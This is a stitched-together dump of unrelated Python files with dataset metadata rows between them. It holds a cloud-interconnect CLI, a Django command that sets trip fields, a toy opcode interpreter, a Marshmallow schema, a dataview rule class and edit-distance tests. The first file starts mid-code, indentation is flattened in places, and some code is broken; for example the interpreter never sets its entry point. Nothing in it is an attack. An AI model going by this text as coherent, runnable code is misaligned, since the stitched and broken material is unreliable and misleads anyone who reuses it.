'--mcic_id',
metavar='<mcic_id>',
required=True,
help='mCIC ID [Type: String]')
parser.add_argument(
'--cic_name',
metavar='<cic_name>',
required=True,
help='CIC friendly name [Type: String]')
parser.add_argument(
'--logical_nw_id',
metavar='<logical_nw_id>',
required=True,
help='NGC logical NW ID [Type: String]')
parser.add_argument(
'--colo_vlan_id',
metavar='<colo_vlan_id>',
help='Co-location VLAN ID [Type: Int]')
parser.add_argument(
'--server_segment_nbr',
metavar='<server_segment_nbr>',
help='Server Segment Number [Type: Int]')
return parser
def take_action(self, parsed_args):
ecc_client = self.app.client_manager.interconnectivity
required = ('cic_name', 'logical_nw_id')
optional = ('colo_vlan_id', 'server_segment_nbr')
body = get_request_body(parsed_args, required, optional)
try:
cic = ecc_client.create_cic(body, parsed_args.mcic_id)
printout = cic
except exceptions.ClientException as clientexp:
printout = {"message": clientexp.message,
"details": clientexp.details,
"code": clientexp.code}
return zip(*sorted(six.iteritems(printout)))
class UpdateCIC(command.ShowOne):
def get_parser(self, prog_name):
parser = super(UpdateCIC, self).get_parser(prog_name)
parser.add_argument(
'--mcic_id',
metavar='<mcic_id>',
required=True,
help='mCIC ID [Type: String]')
parser.add_argument(
'--cic_id',
metavar='<cic_id>',
required=True,
help='CIC ID [Type: String]')
parser.add_argument(
'--cic_name',
metavar='<cic_name>',
help='CIC friendly name [Type: String]')
return parser
def take_action(self, parsed_args):
ecc_client = self.app.client_manager.interconnectivity
required = ()
optional = ('cic_name',)
body = get_request_body(parsed_args, required, optional)
try:
            cic = ecc_client.update_cic(body=body, mcic_id=parsed_args.mcic_id, cic_id=parsed_args.cic_id)
printout = cic
except exceptions.ClientException as clientexp:
printout = {"message": clientexp.message,
"details": clientexp.details,
"code": clientexp.code}
return zip(*sorted(six.iteritems(printout)))
class DeleteCIC(command.ShowOne):
def get_parser(self, prog_name):
parser = super(DeleteCIC, self).get_parser(prog_name)
parser.add_argument(
"--mcic_id",
metavar="<mcic_id>",
required=True,
help="mcic to display (ID)")
parser.add_argument(
"--cic_id",
metavar="<cic_id>",
required=True,
help="cic to display (ID)")
return parser
def take_action(self, parsed_args):
ecc_client = self.app.client_manager.interconnectivity
try:
cic = ecc_client.delete_cic(parsed_args.mcic_id, parsed_args.cic_id)
printout = cic
except exceptions.ClientException as clientexp:
printout = {"message": clientexp.message,
"details": clientexp.details,
"code": clientexp.code}
return zip(*sorted(six.iteritems(printout)))
| 33.815029 | 108 | 0.568205 | 619 | 5,850 | 5.150242 | 0.151858 | 0.033877 | 0.069322 | 0.050816 | 0.739335 | 0.734003 | 0.693225 | 0.693225 | 0.682246 | 0.669385 | 0 | 0 | 0.324957 | 5,850 | 172 | 109 | 34.011628 | 0.807293 | 0 | 0 | 0.649007 | 0 | 0 | 0.13233 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066225 | false | 0 | 0.033113 | 0 | 0.198676 | 0.07947 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9ad80640a01080d03ced28bf57510db3499b0e2 | 784 | py | Python | travels/management/commands/add_trips_fields.py | adrianboratyn/TripRecommendations | d3e5a10d80c405d5ac22f028be54c8198bc10410 | [
"MIT"
] | null | null | null | travels/management/commands/add_trips_fields.py | adrianboratyn/TripRecommendations | d3e5a10d80c405d5ac22f028be54c8198bc10410 | [
"MIT"
] | null | null | null | travels/management/commands/add_trips_fields.py | adrianboratyn/TripRecommendations | d3e5a10d80c405d5ac22f028be54c8198bc10410 | [
"MIT"
] | 2 | 2021-06-26T13:03:22.000Z | 2021-06-27T10:47:59.000Z | import pandas as pd
import os.path
from django.core.management.base import BaseCommand, CommandError
import logging
from travels.models import Trip, TripDates
import datetime
import random
class Command(BaseCommand):
"""
    Class for creating trip types
"""
help = "Creating fields in Trips"
trips = Trip.objects.all().filter(country="Wyspy Zielonego Przylądka")
def handle(self, *args, **options):
"""
        Method for creating trip types
Args:
*args ():
**options ():
"""
for trip in self.trips:
            trip.countryEN = "Cape Verde"
trip.currency = "CVE"
trip.climate = "Morski"
trip.rating = random.uniform(1, 6)
trip.save()
| 25.290323 | 74 | 0.608418 | 86 | 784 | 5.546512 | 0.686047 | 0.046122 | 0.067086 | 0.104822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00361 | 0.293367 | 784 | 30 | 75 | 26.133333 | 0.857401 | 0.137755 | 0 | 0 | 0 | 0 | 0.127243 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.411765 | 0 | 0.647059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b9b5e7332c9a273f6491cc9f8d7e111d28e387bb | 13,105 | py | Python | tools/extjs_cc/js_opcode_exec.py | joeedh/webblender | 552d8eaa762af447346343be244647c316ae32f1 | [
"Apache-2.0"
] | 1 | 2015-05-22T14:11:17.000Z | 2015-05-22T14:11:17.000Z | tools/extjs_cc/js_opcode_exec.py | joeedh/webblender | 552d8eaa762af447346343be244647c316ae32f1 | [
"Apache-2.0"
] | 2 | 2021-09-02T20:01:35.000Z | 2022-01-26T19:47:35.000Z | tools/extjs_cc/js_opcode_exec.py | joeedh/fairmotion | 5c322fc012cdd94ddc2f21d68264c845b3c2c770 | [
"MIT"
] | null | null | null | import traceback, sys
from js_opcode_emit import MAX_REGISTER
from js_global import glob
opcode_map = {}
code = 0
def _gen_code():
global code
code += 1
return code - 1
opcode_map["PUSH"] = _gen_code()
opcode_map["POP"] = _gen_code()
opcode_map["PUSH_UNDEFINED"] = _gen_code()
opcode_map["LOAD_FROM_REG"] = _gen_code()
opcode_map["LOAD_LOCAL_STACK"] = _gen_code()
opcode_map["WRITE_LOCAL_STACK"] = _gen_code()
opcode_map["LOAD_REG_REF"] = _gen_code()
opcode_map["LOAD_REG_INT"] = _gen_code()
opcode_map["LOAD_REG_PTR"] = _gen_code()
opcode_map["LOAD_REG_EXTERN_PTR"] = _gen_code()
opcode_map["LOAD_REG_UNDEFINED"] = _gen_code()
opcode_map["LOAD_REG_FLOAT"] = _gen_code()
opcode_map["LOAD_SYMBOL_PTR"] = _gen_code()
opcode_map["LOAD_SYMBOL_INT"] = _gen_code()
opcode_map["NATIVE_CALL"] = _gen_code()
opcode_map["LOAD_SYMBOL_FLOAT"] = _gen_code()
opcode_map["WRITE_SYMBOL_REF"] = _gen_code()
opcode_map["WRITE_SYMBOL_INT"] = _gen_code()
opcode_map["WRITE_SYMBOL_FLOAT"] = _gen_code()
opcode_map["LOAD_REG_SYMBOL_PTR"] = _gen_code()
opcode_map["LOAD_OPCODE_PTR"] = _gen_code()
opcode_map["WRITE_REG_INT"] = _gen_code()
opcode_map["WRITE_REG_FLOAT"] = _gen_code()
opcode_map["WRITE_REG_REF"] = _gen_code()
opcode_map["WRITE_REG_PTR"] = _gen_code()
opcode_map["LOAD_REF"] = _gen_code()
opcode_map["WRITE_REF"] = _gen_code()
opcode_map["LOAD_CONST_REF"] = _gen_code()
opcode_map["LOAD_CONST_INT"] = _gen_code()
opcode_map["LOAD_CONST_FLOAT"] = _gen_code()
opcode_map["INT_TO_FLOAT"] = _gen_code()
opcode_map["UNDEFINED_TO_ZERO_INT"] = _gen_code()
opcode_map["FLOAT_TO_INT"] = _gen_code()
opcode_map["LOAD_FLOAT"] = _gen_code()
opcode_map["WRITE_REF_LOCAL"] = _gen_code()
opcode_map["WRITE_INT_LOCAL"] = _gen_code()
opcode_map["WRITE_FLOAT_LOCAL"] = _gen_code()
opcode_map["LOAD_REF_LOCAL"] = _gen_code()
opcode_map["LOAD_INT_LOCAL"] = _gen_code()
opcode_map["LOAD_FLOAT_LOCAL"] = _gen_code()
opcode_map["PUSH_REF"] = _gen_code()
opcode_map["SHORTJMP"] = _gen_code()
opcode_map["SHORTJMPTRUE"] = _gen_code()
opcode_map["SHORTJMPTRUE_REG"] = _gen_code()
opcode_map["SHORTJMPFALSE"] = _gen_code()
opcode_map["SHORTJMPFALSE_REG"] = _gen_code()
opcode_map["LONGJMP"] = _gen_code()
opcode_map["PUSHTRY"] = _gen_code()
opcode_map["POPTRY"] = _gen_code()
opcode_map["THROW"] = _gen_code()
opcode_map["INT_TO_FLOAT"] = _gen_code()
opcode_map["FLOAT_TO_INT"] = _gen_code()
opcode_map["ARRAY_REF"] = _gen_code()
opcode_map["ARRAY_SET"] = _gen_code()
opcode_map["ADD_INT"] = _gen_code()
opcode_map["SUB_INT"] = _gen_code()
opcode_map["MUL_INT"] = _gen_code()
opcode_map["DIV_INT"] = _gen_code()
opcode_map["MOD_INT"] = _gen_code()
opcode_map["BITINV"] = _gen_code()
opcode_map["BITAND"] = _gen_code()
opcode_map["BITOR"] = _gen_code()
opcode_map["BITXOR"] = _gen_code()
opcode_map["LSHIFT"] = _gen_code()
opcode_map["RSHIFT"] = _gen_code()
opcode_map["NEGATE"] = _gen_code()
opcode_map["ADD_FLOAT"] = _gen_code()
opcode_map["SUB_FLOAT"] = _gen_code()
opcode_map["MUL_FLOAT"] = _gen_code()
opcode_map["DIV_FLOAT"] = _gen_code()
opcode_map["MOD_FLOAT"] = _gen_code()
opcode_map["LTHAN_INT"] = _gen_code()
opcode_map["GTHAN_INT"] = _gen_code()
opcode_map["LTHANEQ_INT"] = _gen_code()
opcode_map["GTHANEQ_INT"] = _gen_code()
opcode_map["EQ_INT"] = _gen_code()
opcode_map["NOTEQ_INT"] = _gen_code()
opcode_map["NOT_INT"] = _gen_code()
opcode_map["LTHAN_FLOAT"] = _gen_code()
opcode_map["GTHAN_FLOAT"] = _gen_code()
opcode_map["LTHANEQ_FLOAT"] = _gen_code()
opcode_map["GTHANEQ_FLOAT"] = _gen_code()
opcode_map["EQ_FLOAT"] = _gen_code()
opcode_map["NOTEQ_FLOAT"] = _gen_code()
opcode_map["AND"] = _gen_code()
opcode_map["OR"] = _gen_code()
opcode_map["ADD"] = _gen_code()
opcode_map["SUB"] = _gen_code()
opcode_map["MUL"] = _gen_code()
opcode_map["DIV"] = _gen_code()
opcode_map["IN"] = _gen_code()
opcode_map["LOAD_REG_PTR_CONST"] = _gen_code()
rev_opcode_map = {}
for k in opcode_map:
rev_opcode_map[opcode_map[k]] = k
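# Hedged standalone sketch of the inversion pattern built above (a toy table,
# not the real opcode map): a dict comprehension yields the same reverse
# lookup, so names and numeric codes round-trip.
_toy_map = {"PUSH": 0, "POP": 1}
_toy_rev = {v: k for k, v in _toy_map.items()}
assert _toy_rev[_toy_map["POP"]] == "POP"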
class StackItem:
def __init__(self, value=None):
self.value = value
def __str__(self):
return str(self.value)
def __repr__(self):
return str(self)
class Object:
def __init__(self):
self.init = None
self.type_name = ""
self.methods = {}
self.properties = {}
self.child_classes = []
self.class_parent = None
def __str__(self):
return "(obj)"
def __repr__(self):
return str(self)
class UndefinedType(Object):
def __str__(self):
return "None"
Undefined = UndefinedType()
def do_print(machine, string):
print("print:", str(string))
def do_fstr(machine, f):
return str(f)
do_print.totarg = 1
do_fstr.totarg = 1
class Interpretor:
def __init__(self):
self.functions = {"print" : do_print, "fstr" : do_fstr} #native functions
self.globals = {}
self.stack = [StackItem()]
self.code = []
self.cur = 0
self.registers = [Undefined for x in range(MAX_REGISTER)]
self.error = 0
self.trystack = []
self.opfuncs = [0 for x in range(len(opcode_map)+2)]
for k in opcode_map:
if hasattr(self, k):
self.opfuncs[opcode_map[k]] = getattr(self, k)
def reset(self):
self.cur = 0
self.registers = [Undefined for x in range(MAX_REGISTER)]
self.stack = [StackItem()]
def run_function(self, code, funcnode, args):
self.reset()
self.code = code
self.stack.append(StackItem(-1))
for a in args:
self.stack.append(StackItem(a))
self.run(code, funcnode.opcode_addr, do_reset=False)
def run(self, code, entry, do_reset=True):
limit = 500
if do_reset:
self.reset()
        self.code = code
        self.cur = entry
print("\n")
print("starting stack:")
st = self.stack[:]
st.reverse()
for s in st:
print(" " + str(s.value))
print("\n")
def rev(lst):
l = lst[:]
l.reverse()
return str(l)
i = 0
code = self.code
while i < limit:
c = code[self.cur]
self.cur += 1
try:
self.opfuncs[c.type](c.arg)
except:
if glob.g_debug_opcode:
print("%03d %d %s %s | %s %s"%(c.i, c.code, str(c.arg), rev(self.stack[-4:len(self.stack)]), str(self.registers)))
traceback.print_stack()
traceback.print_exc()
sys.exit(-1)
if glob.g_debug_opcode:
print("%03d %s %s | %s %s"%(c.i, c.code, str(c.arg), rev(self.stack[-4:len(self.stack)]), str(self.registers)))
if self.cur < 0: break
i += 1
print("\n")
print("finished", i)
def PUSH(self, args=None):
self.stack.append(StackItem())
def POP(self, args=None):
return self.stack.pop(-1)
def PUSH_UNDEFINED(self, args):
        self.stack.append(StackItem(Undefined))
def LOAD_FROM_REG(self, args):
self.stack[-1].value = self.registers[args]
def LOAD_LOCAL_STACK(self, args):
#print(self.stack)
self.stack[-1].value = self.stack[args].value
def WRITE_LOCAL_STACK(self, args):
self.stack[args].value = self.stack[-1].value
def LOAD_REG_PTR_CONST(self, args):
self.registers[args[0]] = args[1]
def LOAD_REG_REF(self, args):
self.registers[args] = self.stack[-1].value
def LOAD_REG_INT(self, args):
self.registers[args] = self.stack[-1].value
def LOAD_REG_PTR(self, args):
self.registers[args] = self.stack[-1].value
def LOAD_REG_EXTERN_PTR(self, args):
raise RuntimeError("Opcode not fully processed")
def LOAD_REG_UNDEFINED(self, args):
self.registers[args] = Undefined
def LOAD_REG_FLOAT(self, args):
self.registers[args] = self.stack[-1].value
def LOAD_SYMBOL_PTR(self, args):
raise RuntimeError("Opcode not fully processed")
def LOAD_SYMBOL_INT(self, args):
raise RuntimeError("Opcode not fully processed")
def NATIVE_CALL(self, fname):
args = []
totarg = self.functions[fname].totarg
for i in range(self.functions[fname].totarg):
args.append(self.POP(None).value)
ret = self.functions[fname](self, *args)
#return to calling code, with value ret
self.LOAD_REG_PTR(0) #save return value
self.stack[-1].value = ret
self.LONGJMP(0)
def LOAD_SYMBOL_FLOAT(self, args):
raise RuntimeError("Incomplete opcode")
def WRITE_SYMBOL_REF(self, args):
raise RuntimeError("Incomplete opcode")
def WRITE_SYMBOL_INT(self, args):
raise RuntimeError("Incomplete opcode")
def WRITE_SYMBOL_FLOAT(self, args):
raise RuntimeError("Incomplete opcode")
def LOAD_REG_SYMBOL_PTR(self, args):
self.registers[args] = self.stack
def LOAD_OPCODE_PTR(self, args):
self.stack[-1].value = args
def LOAD_REF(self, args):
self.stack[-1].value = args
def LOAD_CONST_REF(self, args):
self.stack[-1].value = args
def LOAD_CONST_INT(self, args):
self.stack[-1].value = args
def LOAD_CONST_FLOAT(self, args):
self.stack[-1].value = args
def INT_TO_FLOAT(self, args):
self.stack[-1].value = float(self.stack[-1].value)
def UNDEFINED_TO_ZERO_INT(self, args):
self.stack[-1].value = 0
def FLOAT_TO_INT(self, args):
self.stack[-1].value = int(self.stack[-1].value)
def PUSH_REF(self, args):
self.stack.append(StackItem(args))
def SHORTJMP(self, args):
self.cur += args
def SHORTJMPTRUE(self, args):
if self.stack[-1] not in [0, None, Undefined]:
self.cur += args
    def SHORTJMPTRUE_REG(self, args):
        if self.registers[args[0]] not in [0, None, Undefined]:
            self.cur += args[1]
def SHORTJMPFALSE(self, args):
if self.stack[-1] in [0, None, Undefined]:
self.cur += args
def SHORTJMPFALSE_REG(self, args):
if self.registers[args[0]] in [0, None, Undefined]:
self.cur += args[1]
def LONGJMP(self, args):
self.cur = self.registers[args]
def PUSHTRY(self, args):
self.trystack.append(args)
def POPTRY(self, args):
self.trystack.pop()
def THROW(self, args):
self.throw_error(args)
def ARRAY_REF(self, args):
pass
def ARRAY_SET(self, args):
pass
def ADD_INT(self, args):
self.stack[-1].value = int(self.registers[2] + self.registers[3])
def SUB_INT(self, args):
self.stack[-1].value = int(self.registers[2] - self.registers[3])
def MUL_INT(self, args):
self.stack[-1].value = int(self.registers[2] * self.registers[3])
def DIV_INT(self, args):
self.stack[-1].value = int(self.registers[2] / self.registers[3])
def MOD_INT(self, args):
self.stack[-1].value = int(self.registers[2] % self.registers[3])
def BITINV(self, args):
pass
def BITAND(self, args):
self.stack[-1].value = self.registers[2] & self.registers[3]
def BITOR(self, args):
self.stack[-1].value = self.registers[2] | self.registers[3]
def BITXOR(self, args):
self.stack[-1].value = self.registers[2] ^ self.registers[3]
def LSHIFT(self, args):
self.stack[-1].value = self.registers[2] << self.registers[3]
def RSHIFT(self, args):
self.stack[-1].value = self.registers[2] >> self.registers[3]
def NEGATE(self, args):
pass
def ADD_FLOAT(self, args):
self.stack[-1].value = self.registers[2] + self.registers[3]
def SUB_FLOAT(self, args):
self.stack[-1].value = self.registers[2] - self.registers[3]
def MUL_FLOAT(self, args):
self.stack[-1].value = self.registers[2] * self.registers[3]
def DIV_FLOAT(self, args):
self.stack[-1].value = self.registers[2] / self.registers[3]
def MOD_FLOAT(self, args):
self.stack[-1].value = self.registers[2] % self.registers[3]
def LTHAN_INT(self, args):
self.stack[-1].value = self.registers[2] < self.registers[3]
def GTHAN_INT(self, args):
self.stack[-1].value = self.registers[2] > self.registers[3]
def LTHANEQ_INT(self, args):
self.stack[-1].value = self.registers[2] <= self.registers[3]
def GTHANEQ_INT(self, args):
self.stack[-1].value = self.registers[2] >= self.registers[3]
def EQ_INT(self, args):
self.stack[-1].value = self.registers[2] == self.registers[3]
def NOTEQ_INT(self, args):
self.stack[-1].value = self.registers[2] != self.registers[3]
def NOT_INT(self, args):
pass
def LTHAN_FLOAT(self, args):
self.stack[-1].value = self.registers[2] < self.registers[3]
def GTHAN_FLOAT(self, args):
self.stack[-1].value = self.registers[2] > self.registers[3]
def LTHANEQ_FLOAT(self, args):
self.stack[-1].value = self.registers[2] <= self.registers[3]
def GTHANEQ_FLOAT(self, args):
self.stack[-1].value = self.registers[2] >= self.registers[3]
def EQ_FLOAT(self, args):
self.stack[-1].value = self.registers[2] == self.registers[3]
def NOTEQ_FLOAT(self, args):
self.stack[-1].value = self.registers[2] != self.registers[3]
def AND(self, args):
self.stack[-1].value = self.registers[2] and self.registers[3]
def OR(self, args):
self.stack[-1].value = self.registers[2] or self.registers[3]
def ADD(self, args):
pass
def SUB(self, args):
pass
def MUL(self, args):
pass
def DIV(self, args):
pass
def IN(self, args):
pass
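The handlers above are one-method-per-opcode; a VM like this typically dispatches them by looking the opcode name up on the instance. A minimal sketch of that dispatch loop (MiniVM and its tiny opcode set are illustrative, not the real VM class this file belongs to):

```python
# Minimal sketch of name-based opcode dispatch, in the style of the handlers above.
class MiniVM:
    def __init__(self):
        self.stack = []
        self.cur = 0  # program counter, advanced by jumps like SHORTJMP

    def LOAD_CONST_INT(self, args):
        self.stack.append(args)

    def ADD_INT(self, args):
        b, a = self.stack.pop(), self.stack.pop()
        self.stack.append(int(a + b))

    def SHORTJMP(self, args):
        self.cur += args  # relative jump, same shape as the handler above

    def run(self, program):
        while self.cur < len(program):
            op, args = program[self.cur]
            self.cur += 1
            getattr(self, op)(args)  # dispatch: opcode name -> bound method
        return self.stack

vm = MiniVM()
result = vm.run([
    ("LOAD_CONST_INT", 2),
    ("LOAD_CONST_INT", 3),
    ("ADD_INT", None),
    ("SHORTJMP", 1),         # skip the next instruction
    ("LOAD_CONST_INT", 99),  # skipped by the jump
])
```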
| 27.589474 | 124 | 0.666997 | 1,972 | 13,105 | 4.158215 | 0.080122 | 0.109756 | 0.144268 | 0.177561 | 0.682073 | 0.530488 | 0.432561 | 0.382195 | 0.354878 | 0.296463 | 0 | 0.013581 | 0.174056 | 13,105 | 474 | 125 | 27.647679 | 0.743995 | 0.006715 | 0 | 0.196133 | 0 | 0 | 0.094151 | 0.001614 | 0 | 0 | 0 | 0 | 0 | 1 | 0.256906 | false | 0.027624 | 0.008287 | 0.019337 | 0.301105 | 0.041436 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9b98f75040f721ed9ce4241046ef4a180cbd6ce | 310 | py | Python | flask-app/app/app/schemas/base.py | mcelisr1/flask-docker-backend-stack | 07c640401c42db843ba3e77bba460224591506ab | [
"MIT"
] | 2 | 2019-04-30T23:48:36.000Z | 2019-07-17T15:26:57.000Z | flask-app/app/app/schemas/base.py | mcelisr1/flask-docker-backend-stack | 07c640401c42db843ba3e77bba460224591506ab | [
"MIT"
] | null | null | null | flask-app/app/app/schemas/base.py | mcelisr1/flask-docker-backend-stack | 07c640401c42db843ba3e77bba460224591506ab | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Import installed packages
from marshmallow import fields
from marshmallow import Schema
class BaseSchema(Schema):
def __init__(self, strict=True, **kwargs):
super(BaseSchema, self).__init__(strict=strict, **kwargs)
id = fields.Int()
created_at = fields.DateTime()
| 22.142857 | 61 | 0.693548 | 37 | 310 | 5.567568 | 0.648649 | 0.145631 | 0.203884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003937 | 0.180645 | 310 | 13 | 62 | 23.846154 | 0.807087 | 0.151613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b9c4573248ef113cd2314d5a05238921707f801c | 2,055 | py | Python | basic_samples/SDS/Python/SDSPy/Python3/DataviewGroupRule.py | hanhossain/OCS-Samples | 6f0f7878e6d9bccc32b6d663446678e070859d14 | [
"Apache-2.0"
] | null | null | null | basic_samples/SDS/Python/SDSPy/Python3/DataviewGroupRule.py | hanhossain/OCS-Samples | 6f0f7878e6d9bccc32b6d663446678e070859d14 | [
"Apache-2.0"
] | null | null | null | basic_samples/SDS/Python/SDSPy/Python3/DataviewGroupRule.py | hanhossain/OCS-Samples | 6f0f7878e6d9bccc32b6d663446678e070859d14 | [
"Apache-2.0"
] | null | null | null | # DataviewGroupRule.py
#
# Copyright (C) 2018 OSIsoft, LLC. All rights reserved.
#
# THIS SOFTWARE CONTAINS CONFIDENTIAL INFORMATION AND TRADE SECRETS OF
# OSIsoft, LLC. USE, DISCLOSURE, OR REPRODUCTION IS PROHIBITED WITHOUT
# THE PRIOR EXPRESS WRITTEN PERMISSION OF OSIsoft, LLC.
#
# RESTRICTED RIGHTS LEGEND
# Use, duplication, or disclosure by the Government is subject to restrictions
# as set forth in subparagraph (c)(1)(ii) of the Rights in Technical Data and
# Computer Software clause at DFARS 252.227.7013
#
# OSIsoft, LLC
# 1600 Alvarado St, San Leandro, CA 94577
import json
class DataviewGroupRule(object):
"""Sds dataview definition"""
@property
def Id(self):
return self.__id
@Id.setter
def Id(self, id):
self.__id = id
@property
def Type(self):
return self.__type
@Type.setter
def Type(self, type_):
self.__type = type_
@property
def TokenRules(self):
return self.__tokenRules
@TokenRules.setter
def TokenRules(self, tokenRules):
self.__tokenRules = tokenRules
def toJson(self):
return json.dumps(self.toDictionary())
def toDictionary(self):
# required properties
dictionary = { 'Id' : self.Id}
if hasattr(self, 'Type'):
dictionary['Type'] = self.Type
if hasattr(self, 'TokenRules'):
dictionary['TokenRules'] = self.TokenRules
return dictionary
@staticmethod
def fromJson(jsonObj):
return DataviewGroupRule.fromDictionary(jsonObj)
@staticmethod
def fromDictionary(content):
dataviewGroupRule = DataviewGroupRule()
if len(content) == 0:
return dataviewGroupRule
if 'Id' in content:
dataviewGroupRule.Id = content['Id']
if 'Type' in content:
dataviewGroupRule.Type = content['Type']
if 'TokenRules' in content:
dataviewGroupRule.TokenRules = content['TokenRules']
return dataviewGroupRule
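The toDictionary/fromDictionary pair above is meant to round-trip through JSON. A quick standalone sketch of that symmetry (stripped-down illustrative class, not the real OSIsoft one, which also carries TokenRules):

```python
import json

# Stripped-down copy of the toDictionary/fromDictionary pattern shown above.
class GroupRuleSketch:
    def toDictionary(self):
        dictionary = {'Id': self.Id}
        if hasattr(self, 'Type'):
            dictionary['Type'] = self.Type
        return dictionary

    @staticmethod
    def fromDictionary(content):
        rule = GroupRuleSketch()
        if 'Id' in content:
            rule.Id = content['Id']
        if 'Type' in content:
            rule.Type = content['Type']
        return rule

rule = GroupRuleSketch.fromDictionary({'Id': 'g1', 'Type': 'StreamName'})
round_tripped = json.loads(json.dumps(rule.toDictionary()))
```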
| 24.759036 | 78 | 0.637956 | 219 | 2,055 | 5.922374 | 0.420091 | 0.03084 | 0.032382 | 0.064765 | 0.080956 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01679 | 0.275426 | 2,055 | 82 | 79 | 25.060976 | 0.854265 | 0.287105 | 0 | 0.159091 | 0 | 0 | 0.042966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.227273 | false | 0 | 0.022727 | 0.113636 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
b9c8a1d404db5a7007ea8d82fa56259be8237f8f | 1,782 | py | Python | tests/lib/test_common.py | Dylnuge/lunch-bot | 8770bac9e7a824d9ed75e7aa3abcc112be840509 | [
"MIT"
] | 1 | 2020-02-19T19:52:41.000Z | 2020-02-19T19:52:41.000Z | tests/lib/test_common.py | Dylnuge/lunch-bot | 8770bac9e7a824d9ed75e7aa3abcc112be840509 | [
"MIT"
] | 11 | 2020-01-14T23:32:40.000Z | 2020-02-07T17:51:13.000Z | tests/lib/test_common.py | Dylnuge/lunch-bot | 8770bac9e7a824d9ed75e7aa3abcc112be840509 | [
"MIT"
] | 2 | 2020-02-19T19:53:30.000Z | 2020-02-20T15:02:53.000Z | from lib.common import min_edit_distance
from lib.common import send_reply
def test_send_reply(mock_client, make_zulip_message):
"""
Tests that send_reply functions correctly.
"""
mock_client.email = "lunch-bot-bot@zulipchat.com"
message, _ = make_zulip_message("help")
send_reply(
mock_client, message, "Here is a reply!",
)
mock_client.send_message.assert_called_with(
{"type": "private", "to": ["tester@email.com",], "content": "Here is a reply!",}
)
def test_min_edit_distance_insert():
"""
Tests that the insert cost functions correctly. Forced to insert by making
the source string empty.
"""
assert 1234 == min_edit_distance("", "a", insert_cost=lambda char: 1234)
def test_min_edit_distance_delete():
"""
Tests that the delete cost functions correctly. Forced to delete by making
the target string empty.
"""
assert 1234 == min_edit_distance("a", "", delete_cost=lambda char: 1234)
def test_min_edit_distance_replace():
"""
Tests that the replace cost functions correctly.
"""
assert 1234 == min_edit_distance(
"a",
"b",
insert_cost=lambda char: 5000,
delete_cost=lambda char: 5000,
replace_cost=lambda source_char, target_char: 1234,
)
def test_min_edit_distance_equal():
"""
Ensures that when two strings are the same, the min edit distance metric has
a cost of 0.
"""
assert 0 == min_edit_distance("same_string", "same_string")
assert 0 == min_edit_distance("abc", "abc")
def test_min_edit_distance():
"""
General test cases for min edit distance between two words.
"""
assert 1 == min_edit_distance("cat", "cats")
assert 4 == min_edit_distance("door", "gore")
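The expected values above imply the library's default costs: unit insert/delete, substitution cost 2, and 0 for a match (which is why "door" -> "gore" is 4 rather than the classic Levenshtein 3). An illustrative standalone DP with that contract (not the actual lib.common implementation):

```python
# Illustrative reimplementation of the cost contract the tests above imply:
# unit insert/delete, replace cost 2, and 0 when characters already match.
def min_edit_distance(source, target,
                      insert_cost=lambda char: 1,
                      delete_cost=lambda char: 1,
                      replace_cost=lambda s_char, t_char: 2):
    rows, cols = len(source) + 1, len(target) + 1
    dist = [[0] * cols for _ in range(rows)]
    for i in range(1, rows):  # cost of deleting every source prefix
        dist[i][0] = dist[i - 1][0] + delete_cost(source[i - 1])
    for j in range(1, cols):  # cost of inserting every target prefix
        dist[0][j] = dist[0][j - 1] + insert_cost(target[j - 1])
    for i in range(1, rows):
        for j in range(1, cols):
            sub = 0 if source[i - 1] == target[j - 1] \
                else replace_cost(source[i - 1], target[j - 1])
            dist[i][j] = min(dist[i - 1][j] + delete_cost(source[i - 1]),
                             dist[i][j - 1] + insert_cost(target[j - 1]),
                             dist[i - 1][j - 1] + sub)
    return dist[-1][-1]
```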
